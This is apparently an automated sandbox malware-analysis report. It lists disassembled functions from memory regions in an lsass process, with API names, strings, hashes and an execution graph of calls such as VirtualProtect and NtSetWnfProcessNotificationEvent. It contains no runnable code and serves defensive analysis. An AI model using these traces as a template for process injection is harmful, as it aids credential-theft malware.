                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction ID: 0a5f03d881548423950f550b58b8fc74d35f60bbb561fa5f685fc2d061d5bb49
                                                                                • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction Fuzzy Hash: 7EF06D71655B0582EB128B26E8443A97320EB8CBB5F740219CF6E472F4CF3DC948D381
                                                                                Function 00000140AE8650D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                • Instruction ID: 73fda85837acdd30ad006dc6ccb1667200e15de9212539d4e27f8f5c03466d3a
                                                                                • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                • Instruction Fuzzy Hash: 2702FA32259B8486EB61DB56F49439AB7A1F7C8794F200415EB8E87BB8DF7CC844CB41
                                                                                Function 00000140AE865710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                • Instruction ID: 819f4eb226d638b22eb9453569fbd0dff2ed878ae5cb7d9cc285f1354ad887c7
                                                                                • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                • Instruction Fuzzy Hash: 9B61C536559B44C6E7629B16F48439AB7A0F7887A4F600515EF8E47BB8DF7CC840CB82
                                                                                Function 00000140AE874104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 28d524a13795f3523b3f1b4b207150eb2f338f5cab7179f9a4c1ef00b7941454
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: DC119132AD0B5011F667256AD4913E531446B6DBB8F390624AF7E176F68B34CC41C2A2
                                                                                Function 00000140ADFD3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 2e1910b8291bafd17102f3214c72d3e729590e13e78c3872cab4fc5f060f1e3e
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 22115472614B5353FA56162AE4553EB31C36F5C37CF784628AFE6076F68A34E8436200
                                                                                Function 00000140ADFCF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: 48ac8b7a938d00f4a24374fee49c64dd94bfb0dfea2bd827f35d3ab40a9a7452
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: 3961B43652234853FA6B8B67E5443EBBAA3EF8D748F744415CB46077B4DB34C967A200
                                                                                Function 00000140AE86AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3544855599-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: 1c54ac8669fca167ed3fb4a5461af2b1e7039b1515757cf07daf6e620200d245
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: B6619F33640B848AEB11DF66D4403DD77A0F748BA8F244256EF4E17BA9DB38C995C781
                                                                                Function 00000140AE86AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 6cac39d5d8876cbc65fde025732dcd94be71c236f1742025846821184820e854
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: D951AF72180780CAEB768F17958439977A0F358BA8F244256DF9D47BE5CB38D890D782
                                                                                Function 00000140ADFCA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 5e9ed10956360af88f8a3a4b9cf73a15bede84b98f5d365089c0e3503e132e06
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: B751E432120388CBEB658B6794443DA37A3FB58B84F244117DB4947BE5CB39E5A2E700
                                                                                Function 00000140ADFC8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: 595c9e32b9df4e514150441d0aa3e925450171a8e5ef433ea7709e32150aded9
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: E551E43272170487DB96CF16D404BEA3797FB48BA8F318424DB06437A8EBB4C952A704
                                                                                Function 00000140ADFC83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: fdcdef5ba31d8dbb8912a9a905e6b67567b4155f9952f6a6302e3e1a43461dee
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: 4831CF3122174487E792DF13E844BDA37A7FB48B98F258414EF8A037A8CB38C952D704
                                                                                Function 00000140AE872058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction ID: 4b0a4d86e2932106c0371b6ae4a27eadaf1a36e0bf94906de29ca74a04e3cc8d
                                                                                • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction Fuzzy Hash: 44D1D072B54B8089E712CFAAD5403EC3BB1F3587A8F244216CF5D97BA9DA34C946C381
                                                                                Function 00000140AE8614A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction ID: e0938be913c4546f92e354b3f490316f5aad01bc8c73eed3b2a93003b4ccae50
                                                                                • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction Fuzzy Hash: 4C015A32A40B90C6E706DF67E94828A77A1F78DFA1F244425EF4E4372ADE38C851C791
                                                                                Function 00000140AE872980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction ID: bfe30e0d5e1943aced18828ddcaefd42f41aed77c308e3009ff5d43c7c6b682c
                                                                                • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction Fuzzy Hash: A491AFB264075085F762DF6A94803ED3BA4F758BA8F744109DF4E67AA5DB34CC82C782
                                                                                Function 00000140AE867960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 2933794660-0
                                                                                • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction ID: a5c049cb69e96cfbb56616fdcd891d3e75a6c1cb872cb67dafead8936c6c1fcc
                                                                                • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction Fuzzy Hash: 28110632B50B018AEB008B61E8542A833A4F719768F540E21DF6D87BA4DF78C598D2C1
                                                                                Function 00000140ADFC9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: fd2f36d4469ca00d580b9035ee875e4ebab09abcf6c64778c8a765e7c8b01963
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: E9619F33610B888AEB21DF66D0403DE77B2FB48B89F244215EF4917BA8DB38D166D700
                                                                                Function 00000140AE862330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction ID: c9d078df74486e421dded553d044dc307dfc5948a87b49d5b9b062cc3c97baf6
                                                                                • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction Fuzzy Hash: EE51E03228438181E676DB2FA1583EAA791F3CD7A4F640165DF4D03BAADA39CD44C7C2
                                                                                Function 00000140AE8726F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction ID: 3e73605a521e4cce57338457d13aec77e0fda4a33a28f7c4ac6780cba42ba59d
                                                                                • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction Fuzzy Hash: 48417172615B8086DB219F6AE8443E977A1F7987A4F604025EF4D87BA4DB3CC941C781
                                                                                Function 00000140AE8694A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: c81f436458b37827e035cf8ccd5af5f126ed8c86e3896386e64a1e0766a3eb38
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: D7112B32614B8082EB628B16E44439977E5F788BA8F684260EF8C077A9DF3CC955CB40
                                                                                Function 00000140ADFC7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 56ed09fddae288ef6c89d74bd241d2dfe88a9543861981f92f91ccf0ba0ae745
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: DCE08671650B4892DF038F22E8402D933A3DF5DB68B9891229A5C07321FA38D1FAD301
                                                                                Function 00000140ADFC73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: 4940423c840106aa278dadeec7b987efc7fd2bbde3a41644df2d62b25ed6cadf
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 05E08671610B4886DF028F22E4401D97363EF5DB58B989122CA4C07321FA38D1E6D300
                                                                                Function 00000140AE861BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: 65c83ae18bbeee38c1f395d24bd21a894001158fe5ba6808c8c40ff99673c146
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: 0F119E35A41B5485EB46DB6BA8082A977A1FB8DFE0F284028DF4D47776DF38C842D381
                                                                                Function 00000140AE861268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction ID: 8c25a065afb30b7e91423b8a6a5c310c77542b609ab35f2169316764477aec7c
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: 47E03935A4170486EB068B63D80838A36E1EB8EB26F2480248E0907361DF7D8899D7A1

                                                                                Execution Graph

                                                                                Execution Coverage:4.9%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:193
                                                                                Total number of Limit Nodes:2
                                                                                execution_graph 1154 7ff6e4d811d8 1155 7ff6e4d811fa 1154->1155 1156 7ff6e4d8121a 1155->1156 1157 7ff6e4d81201 _initterm 1155->1157 1167 7ff6e4d81880 1156->1167 1157->1156 1160 7ff6e4d8126a 1161 7ff6e4d8126f malloc 1160->1161 1162 7ff6e4d8128b 1161->1162 1163 7ff6e4d812a0 strlen malloc memcpy 1162->1163 1163->1163 1164 7ff6e4d812d0 1163->1164 1165 7ff6e4d8132d _cexit 1164->1165 1166 7ff6e4d81338 1164->1166 1165->1166 1168 7ff6e4d81247 SetUnhandledExceptionFilter 1167->1168 1169 7ff6e4d818a2 1167->1169 1168->1160 1169->1168 1170 7ff6e4d8194d 1169->1170 1176 7ff6e4d81a20 1169->1176 1171 7ff6e4d81956 1170->1171 1172 7ff6e4d8199e 1170->1172 1171->1172 1180 7ff6e4d81ba0 1171->1180 1172->1168 1175 7ff6e4d819e9 VirtualProtect 1172->1175 1173 7ff6e4d81b5c 1175->1172 1176->1172 1176->1173 1177 7ff6e4d81b36 1176->1177 1178 7ff6e4d81ba0 4 API calls 1177->1178 1179 7ff6e4d81b53 1178->1179 1182 7ff6e4d81bc2 1180->1182 1181 7ff6e4d81c04 memcpy 1181->1171 1182->1181 1184 7ff6e4d81c45 VirtualQuery 1182->1184 1185 7ff6e4d81cf4 1182->1185 1184->1185 1189 7ff6e4d81c72 1184->1189 1186 7ff6e4d81d23 GetLastError 1185->1186 1187 7ff6e4d81d37 1186->1187 1188 7ff6e4d81ca4 VirtualProtect 1188->1181 1188->1186 1189->1181 1189->1188 1382 7ff6e4d81e65 1383 7ff6e4d81e67 signal 1382->1383 1384 7ff6e4d81e7c 1383->1384 1385 7ff6e4d81e99 1383->1385 1384->1385 1386 7ff6e4d81e82 signal 1384->1386 1386->1385 1242 7ff6e4d815e4 1243 7ff6e4d81394 2 API calls 1242->1243 1244 7ff6e4d815f3 1243->1244 1200 7ff6e4d82320 strlen 1201 7ff6e4d82337 1200->1201 1254 7ff6e4d838e0 wcslen 1262 7ff6e4d8157b 1254->1262 1263 7ff6e4d81394 2 API calls 1262->1263 1346 7ff6e4d8219e 1347 7ff6e4d821ab EnterCriticalSection 1346->1347 1348 7ff6e4d82272 1346->1348 1349 7ff6e4d82265 LeaveCriticalSection 1347->1349 1351 7ff6e4d821c8 1347->1351 1349->1348 1350 7ff6e4d821e9 TlsGetValue GetLastError 1350->1351 1351->1349 1351->1350 1387 7ff6e4d8146d 1388 7ff6e4d81394 2 API calls 1387->1388 1264 7ff6e4d865ec 1265 7ff6e4d865f9 1264->1265 1266 7ff6e4d866e6 wcslen 1264->1266 1265->1266 1313 7ff6e4d8153f 1266->1313 1314 7ff6e4d81394 2 API calls 1313->1314 1315 7ff6e4d8154e 1314->1315 1316 7ff6e4d81394 2 API calls 1315->1316 1352 7ff6e4d81ab3 1353 7ff6e4d81a70 1352->1353 1353->1352 1354 7ff6e4d8199e 1353->1354 1355 7ff6e4d81b36 1353->1355 1358 7ff6e4d81b5c 1353->1358 1356 7ff6e4d81a0f 1354->1356 1359 7ff6e4d819e9 VirtualProtect 1354->1359 1357 7ff6e4d81ba0 4 API calls 1355->1357 1360 7ff6e4d81b53 1357->1360 1359->1354 1360->1360 1202 7ff6e4d81530 1204 7ff6e4d81394 1202->1204 1205 7ff6e4d89a50 malloc 1204->1205 1206 7ff6e4d813b8 1205->1206 1207 7ff6e4d813c6 NtSetWnfProcessNotificationEvent 1206->1207 1391 7ff6e4d81a70 1392 7ff6e4d8199e 1391->1392 1396 7ff6e4d81a7d 1391->1396 1393 7ff6e4d81a0f 1392->1393 1394 7ff6e4d819e9 VirtualProtect 1392->1394 1394->1392 1395 7ff6e4d81b5c 1396->1391 1396->1395 1397 7ff6e4d81b36 1396->1397 1398 7ff6e4d81ba0 4 API calls 1397->1398 1399 7ff6e4d81b53 1398->1399 1400 7ff6e4d8216f 1401 7ff6e4d82178 InitializeCriticalSection 1400->1401 1402 7ff6e4d82185 1400->1402 1401->1402 1403 7ff6e4d8653c 1406 7ff6e4d82df0 1403->1406 1407 7ff6e4d82e00 1406->1407 1416 7ff6e4d82690 1407->1416 1449 7ff6e4d8155d 1416->1449 1450 7ff6e4d81394 2 API calls 1449->1450 1208 7ff6e4d81404 1209 7ff6e4d81394 2 API calls 1208->1209 1210 7ff6e4d81413 1209->1210 1211 7ff6e4d81394 2 API calls 1210->1211 1212 7ff6e4d82104 1213 7ff6e4d82111 EnterCriticalSection 1212->1213 1217 7ff6e4d82218 1212->1217 1215 7ff6e4d8220b LeaveCriticalSection 1213->1215 1219 7ff6e4d8212e 1213->1219 1214 7ff6e4d82272 1215->1217 1216 7ff6e4d82241 DeleteCriticalSection 1216->1214 1217->1214 1217->1216 1218 7ff6e4d8214d TlsGetValue GetLastError 1218->1219 1219->1215 1219->1218 1317 7ff6e4d81ac3 1319 7ff6e4d81a70 1317->1319 1318 7ff6e4d81b5c 1319->1318 1320 7ff6e4d81b36 1319->1320 1324 